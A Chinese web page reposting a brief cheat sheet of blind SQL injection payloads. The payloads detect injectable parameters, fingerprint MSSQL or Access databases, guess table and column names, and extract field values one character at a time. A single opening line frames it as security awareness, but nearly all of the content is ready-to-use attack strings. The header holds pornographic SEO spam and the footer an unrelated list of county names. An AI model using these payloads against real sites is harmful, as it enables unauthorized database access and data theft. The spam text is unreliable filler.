国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > 文庫 > 正文

進行SQL注入的幾個簡單方法

2024-09-07 22:12:17
字體:
來源:轉載
供稿:網友

了解SQL注入可以有效提升程序的安全,下面給出幾個簡單的SQL注入方式:

1.判斷是否有注入;and 1=1 ;and 1=2

2.初步判斷是否是mssql ;and user>0

3.注入參數是字符'and [查詢條件] and ''='

4.搜索時沒過濾參數的'and [查詢條件] and '%25'='

5.判斷數據庫系統

;and (select count(*) from sysobjects)>0 mssql
  ;and (select count(*) from msysobjects)>0 access

6.猜數據庫 ;and (select Count(*) from [數據庫名])>0

7.猜字段 ;and (select Count(字段名) from 數據庫名)>0

8.猜字段中記錄長度 ;and (select top 1 len(字段名) from 數據庫名)>0

9.

(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 數據庫名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 數據庫名)>0

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 方正县| 得荣县| 临西县| 瑞昌市| 永登县| 株洲市| 兴国县| 盐津县| 平阳县| 清徐县| 南宫市| 阳西县| 万山特区| 疏附县| 长乐市| 随州市| 梅河口市| 镇坪县| 夏河县| 炉霍县| 宣汉县| 广南县| 镇安县| 济源市| 杨浦区| 银川市| 东乡县| 夏河县| 长垣县| 嵩明县| 常熟市| 翁牛特旗| 前郭尔| 汉阴县| 陕西省| 乐昌市| 衡阳市| 红安县| 金秀| 武宁县| 双柏县|